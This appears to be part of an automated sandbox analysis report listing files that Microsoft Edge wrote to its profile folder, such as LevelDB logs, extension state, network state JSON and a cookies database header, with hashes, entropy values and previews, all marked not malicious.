Preview:	2024/11/02-14:51:58.423 175c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/02-14:51:58.433 175c Recovering log #3.2024/11/02-14:51:58.433 175c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	330
Entropy (8bit):	5.205109234365607
Encrypted:	false
SSDEEP:	6:HvCQUCL+q2PcNwi23oH+Tcwt8aPrqIFUt8YvCwToKWZmw+YvCwT+LVkwOcNwi230:1Um+vLZYebL3FUt8mEKW/+mWV54ZYebc
MD5:	CDD0E7C6948487BABB02E5A3F034492E
SHA1:	79BC0BB45A5788E90DDACFC636977CFDF0A177FC
SHA-256:	28BCB05767805062D82D367CE8AB942DCEDCE12242B33901B6B38564B77F0C77
SHA-512:	C28C2796E96DEEA3D8426F664E2DE9F8E546D5BC79B313FBA6A8FE847A88A7A7C99BA708F8B5B57708BDF80AC9950FA58239CCAF138D94653E50536E9F589BB5
Malicious:	false
Preview:	2024/11/02-14:51:58.423 175c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/02-14:51:58.433 175c Recovering log #3.2024/11/02-14:51:58.433 175c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:	BF097D724FDF1FCA9CF3532E86B54696
SHA1:	4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:	1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:	31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	334
Entropy (8bit):	5.23254897751905
Encrypted:	false
SSDEEP:	6:HvCwE+L+q2PcNwi23oH+Tcwt865IFUt8YvCwVoKWZmw+YvCwV+LVkwOcNwi23oHY:tv+vLZYeb/WFUt8mOKW/+mIV54ZYeb/L
MD5:	B18BDA0DC86260EAE0E76A1D65A23591
SHA1:	A75C36A37E6AD4C634270564C3C521BBC5F10A2F
SHA-256:	FC92999FE82765408D02B88D710BB8A8D7B31EC9E63DBB7390A2F19B5C9FBA91
SHA-512:	C3F5402D9A5000444DC35F2443615862770E5F148A16EB9C3077712B760550366E8AB627CDCCD187DEFFE775E39B6AB8C9D1225BF7C2C3CA3F430D860330C5C5
Malicious:	false
Preview:	2024/11/02-14:51:58.438 175c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/02-14:51:58.439 175c Recovering log #3.2024/11/02-14:51:58.439 175c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	334
Entropy (8bit):	5.23254897751905
Encrypted:	false
SSDEEP:	6:HvCwE+L+q2PcNwi23oH+Tcwt865IFUt8YvCwVoKWZmw+YvCwV+LVkwOcNwi23oHY:tv+vLZYeb/WFUt8mOKW/+mIV54ZYeb/L
MD5:	B18BDA0DC86260EAE0E76A1D65A23591
SHA1:	A75C36A37E6AD4C634270564C3C521BBC5F10A2F
SHA-256:	FC92999FE82765408D02B88D710BB8A8D7B31EC9E63DBB7390A2F19B5C9FBA91
SHA-512:	C3F5402D9A5000444DC35F2443615862770E5F148A16EB9C3077712B760550366E8AB627CDCCD187DEFFE775E39B6AB8C9D1225BF7C2C3CA3F430D860330C5C5
Malicious:	false
Preview:	2024/11/02-14:51:58.438 175c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/02-14:51:58.439 175c Recovering log #3.2024/11/02-14:51:58.439 175c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
MD5:	826B4C0003ABB7604485322423C5212A
SHA1:	6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
SHA-256:	C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
SHA-512:	0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	327
Entropy (8bit):	5.176473497022526
Encrypted:	false
SSDEEP:	6:Hvwf+q2PcNwi23oH+Tcwt8NIFUt8YvwfZmw+YvwfVkwOcNwi23oH+Tcwt8+eLJ:RvLZYebpFUt81/+n54ZYebqJ
MD5:	6654D80A7CA52C42AC7D8AAEA5406AF3
SHA1:	7E128E80BE47C4371F352EB90703E8A40577AFE5
SHA-256:	7112BA8191DCB0B52141E63C4E102F73CE920B68FDBB4FF36B2FD7972179B94C
SHA-512:	5EF8B97B92A807FB6065BD31C30E7C3AE9F7F4F39CCEB6C0A88A0FDF9CF233F15976B8EF5F398B1678D071F9F11A1874A1FAB0B55F4DF80957164C46F41EA028
Malicious:	false
Preview:	2024/11/02-14:51:59.332 e28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/02-14:51:59.332 e28 Recovering log #3.2024/11/02-14:51:59.332 e28 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	327
Entropy (8bit):	5.176473497022526
Encrypted:	false
SSDEEP:	6:Hvwf+q2PcNwi23oH+Tcwt8NIFUt8YvwfZmw+YvwfVkwOcNwi23oH+Tcwt8+eLJ:RvLZYebpFUt81/+n54ZYebqJ
MD5:	6654D80A7CA52C42AC7D8AAEA5406AF3
SHA1:	7E128E80BE47C4371F352EB90703E8A40577AFE5
SHA-256:	7112BA8191DCB0B52141E63C4E102F73CE920B68FDBB4FF36B2FD7972179B94C
SHA-512:	5EF8B97B92A807FB6065BD31C30E7C3AE9F7F4F39CCEB6C0A88A0FDF9CF233F15976B8EF5F398B1678D071F9F11A1874A1FAB0B55F4DF80957164C46F41EA028
Malicious:	false
Preview:	2024/11/02-14:51:59.332 e28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/02-14:51:59.332 e28 Recovering log #3.2024/11/02-14:51:59.332 e28 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	429
Entropy (8bit):	5.809210454117189
Encrypted:	false
SSDEEP:	6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
MD5:	5D1D9020CCEFD76CA661902E0C229087
SHA1:	DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
SHA-256:	B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
SHA-512:	5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
Malicious:	false
Preview:	{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	0.2191763562065486
Encrypted:	false
SSDEEP:	3:etDl9tFlljq7A/mhWJFuQ3yy7IOWUQJJtnotdweytllrE9SFcTp4AGbNCV9RUIHJ:etDlG75fOijn4d0Xi99pEY5J
MD5:	34D24BFE2F1EC9CEECCD0506CA7997F8
SHA1:	975002698B83F9D144BE29074B7068656BAAA50B
SHA-256:	D3967AFBBCF141A2E020D13E2B8145F041855CB79C033D265C958F846D686354
SHA-512:	5C02F1D8AB566A7EBF732B6E95C36621EE404B307E3CE7E9B2D3708D73B8E9F6FCA108D2DB2E0215FFAAF73C728C2FA984A962B79CAE190B03C91B4F8E85E1AC
Malicious:	false
Preview:	..............kC...&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (1597), with CRLF line terminators
Category:	dropped
Size (bytes):	115717
Entropy (8bit):	5.183660917461099
Encrypted:	false
SSDEEP:	1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:	3D8183370B5E2A9D11D43EBEF474B305
SHA1:	155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:	6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:	B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:	false
Preview:	{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs\|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs\|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	3.647800924968956
Encrypted:	false
SSDEEP:	384:aj9P0bQkQerkjl5cbP/KbtZ773pLIRKToaA9gam6Iqhf:adwe2ml+bP/o7WRKcca9
MD5:	A905A00BCA0A873FA93FB4C8DD571DAA
SHA1:	5745D77DB618F0897F4C234AB5CE0B8D2565E123
SHA-256:	963E0581F8C0551EEE25E7CF0A4F0887C0D8A0D8A6F235C75B15591CEF1BDBAC
SHA-512:	E36145DB55A0606DC0F9B8C99BC42B71851E6B33604372D52107851A47C60048C597BC3AB31E71715E893D65F631377CE70EB386FD5163E4AED11283FE10BBC5
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	411
Entropy (8bit):	5.245065811434934
Encrypted:	false
SSDEEP:	12:8vLZYeb8rcHEZrELFUt8kY/+kA54ZYeb8rcHEZrEZSJ:GlYeb8nZrExg8kCqoYeb8nZrEZe
MD5:	472BC70C377ABF94EE1CA6E3E78C561E
SHA1:	7FEE77FDF690BFAF40602DFA14E07E675140AFBA
SHA-256:	8FEADE0A8F97614911452F2BF46855955134DE1D8CC8CB79EE1FBF48C83BD21F
SHA-512:	F97D7A23AA38F916F2A3B4B2F3C112707777B499CD3CF0487B9B56A95BB5E9BA71D7E827C07D613E1DE71D648BE32E695EA9DF7A0FBB75B780A7B8C9B5A3E6BF
Malicious:	false
Preview:	2024/11/02-14:52:03.513 e28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/02-14:52:03.514 e28 Recovering log #3.2024/11/02-14:52:03.514 e28 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	411
Entropy (8bit):	5.245065811434934
Encrypted:	false
SSDEEP:	12:8vLZYeb8rcHEZrELFUt8kY/+kA54ZYeb8rcHEZrEZSJ:GlYeb8nZrExg8kCqoYeb8nZrEZe
MD5:	472BC70C377ABF94EE1CA6E3E78C561E
SHA1:	7FEE77FDF690BFAF40602DFA14E07E675140AFBA
SHA-256:	8FEADE0A8F97614911452F2BF46855955134DE1D8CC8CB79EE1FBF48C83BD21F
SHA-512:	F97D7A23AA38F916F2A3B4B2F3C112707777B499CD3CF0487B9B56A95BB5E9BA71D7E827C07D613E1DE71D648BE32E695EA9DF7A0FBB75B780A7B8C9B5A3E6BF
Malicious:	false
Preview:	2024/11/02-14:52:03.513 e28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/02-14:52:03.514 e28 Recovering log #3.2024/11/02-14:52:03.514 e28 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1654
Entropy (8bit):	5.677591340695544
Encrypted:	false
SSDEEP:	48:3ZupYjz/rXZGefV03Sx4kVrUtB0GHHHxda2LoEJ:3oKTxXJVrgRxLn
MD5:	6DE18A0CC9583FA9031EB4C3C55895F5
SHA1:	37FB44F727D8659D0CD13536A9D5A6383E06C1C9
SHA-256:	611056A8505CF0A086B1657891028619B4B61DCC7F18BE7E1310E38C9281BBF5
SHA-512:	D1B70CD960CFE3CD28FCF76C3CDF009E9A71557B3BD54D7EA28E3CBAB4AE3E2AD6CA9E9ACE04943B17D0835B69BE7B5C1EE342D4E1C5A780DF091E257D06DE6A
Malicious:	false
Preview:	....x................VERSION.1..META:https://ntp.msn.com.............._https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":464}.!_https://ntp.msn.com..LastKnownPV..1730573529742.-_https://ntp.msn.com..LastVisuallyReadyMarker..1730573531732.._https://ntp.msn.com..MUID!.1CE105B96555657E15301092645D6402.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1730573529841,"schedule":[-1,35,-1,4,-1,-1,9],"scheduleFixed":[-1,35,-1,4,-1,-1,9],"simpleSchedule":[24,21,44,26,27,48,52]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1730573529675.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241101.317"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https:/

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.197743461934263
Encrypted:	false
SSDEEP:	6:HvCD+q2PcNwi23oH+Tcwt8a2jMGIFUt8YvClXZmw+YvCHONVkwOcNwi23oH+Tcw2:jvLZYeb8EFUt8jX/+ZOz54ZYeb8bJ
MD5:	59A8440452EF5B1C787925C4AFA029A4
SHA1:	5E85847FA04127E696E42503E361FECAF5859A56
SHA-256:	A6735F63C2AB7CC5135E0903CA902660BB77B509A9409782AC98B073A925A417
SHA-512:	62DB5D3AD16F98F6968D6FA495B885BFA1EC14E8A67BE4799F54DD87EA9F35A12100C8617DC8F97E0F630C631E452569728B842125652D6A495179EA188836B3
Malicious:	false
Preview:	2024/11/02-14:51:58.751 1e38 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/02-14:51:58.753 1e38 Recovering log #3.2024/11/02-14:51:58.756 1e38 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.197743461934263
Encrypted:	false
SSDEEP:	6:HvCD+q2PcNwi23oH+Tcwt8a2jMGIFUt8YvClXZmw+YvCHONVkwOcNwi23oH+Tcw2:jvLZYeb8EFUt8jX/+ZOz54ZYeb8bJ
MD5:	59A8440452EF5B1C787925C4AFA029A4
SHA1:	5E85847FA04127E696E42503E361FECAF5859A56
SHA-256:	A6735F63C2AB7CC5135E0903CA902660BB77B509A9409782AC98B073A925A417
SHA-512:	62DB5D3AD16F98F6968D6FA495B885BFA1EC14E8A67BE4799F54DD87EA9F35A12100C8617DC8F97E0F630C631E452569728B842125652D6A495179EA188836B3
Malicious:	false
Preview:	2024/11/02-14:51:58.751 1e38 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/02-14:51:58.753 1e38 Recovering log #3.2024/11/02-14:51:58.756 1e38 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\1bcb7815-c25a-4a2d-a37b-801052ac1b0b.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\32bf0147-d2ba-4689-ac35-29611cfed8ee.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\9aaa0109-85c0-4b67-bd4f-d4cdd6a90fdb.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1618
Entropy (8bit):	5.3035190857054575
Encrypted:	false
SSDEEP:	48:YcCpWsduCvsafc7leeBRsygCgkhYhbyDF:F2vu22keBxukOhy
MD5:	D07414264D2DA6A121F18223DC50EC04
SHA1:	814D93916C113C3BCB1AFF03A5AB5E9CB2A7BD1E
SHA-256:	D594EC617D902BC5C2742BDF21E9D7DFD29CC95A3C1AA7EC8C2D7BA07417A54B
SHA-512:	93746830632AE0D4E0A764C1226D21474C1282831E1A642ED37973841C5AB1E0FB63F89D55B3ACA3460EC3510D464ABCE7157A5128B5DA694AB3D1A7A53D56A4
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218151956","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218812706","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	3.0040750411025834
Encrypted:	false
SSDEEP:	192:tTfLMC25QN7K3mmLE3LrCUbNLP6LrWKmUYO0B/zbl0b:Vf8QNu3mmLE3qMoWKma0B7bl0b
MD5:	F41172BA9CC040AEF157FC473E2EDC95
SHA1:	6D6952BBF6CBCE1714408BF467A1967BB52ED12B
SHA-256:	9B96365B8807E36E685E040961749782F3AADA7DA1689A6A43E369F597AC503C
SHA-512:	56300799B8EED048B3CC61C70575BEDCBDC3F87FA905DAB0FF0EA7B84B293196DA9A0E4902B7D00D7FF16C9DB30FA24F27B2C4D8B49EF59EFDF491F77E45BCF9
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1618
Entropy (8bit):	5.3035190857054575
Encrypted:	false
SSDEEP:	48:YcCpWsduCvsafc7leeBRsygCgkhYhbyDF:F2vu22keBxukOhy
MD5:	D07414264D2DA6A121F18223DC50EC04
SHA1:	814D93916C113C3BCB1AFF03A5AB5E9CB2A7BD1E
SHA-256:	D594EC617D902BC5C2742BDF21E9D7DFD29CC95A3C1AA7EC8C2D7BA07417A54B
SHA-512:	93746830632AE0D4E0A764C1226D21474C1282831E1A642ED37973841C5AB1E0FB63F89D55B3ACA3460EC3510D464ABCE7157A5128B5DA694AB3D1A7A53D56A4
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218151956","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218812706","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF381b4.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1618
Entropy (8bit):	5.3035190857054575
Encrypted:	false
SSDEEP:	48:YcCpWsduCvsafc7leeBRsygCgkhYhbyDF:F2vu22keBxukOhy
MD5:	D07414264D2DA6A121F18223DC50EC04
SHA1:	814D93916C113C3BCB1AFF03A5AB5E9CB2A7BD1E
SHA-256:	D594EC617D902BC5C2742BDF21E9D7DFD29CC95A3C1AA7EC8C2D7BA07417A54B
SHA-512:	93746830632AE0D4E0A764C1226D21474C1282831E1A642ED37973841C5AB1E0FB63F89D55B3ACA3460EC3510D464ABCE7157A5128B5DA694AB3D1A7A53D56A4
Malicious:	false
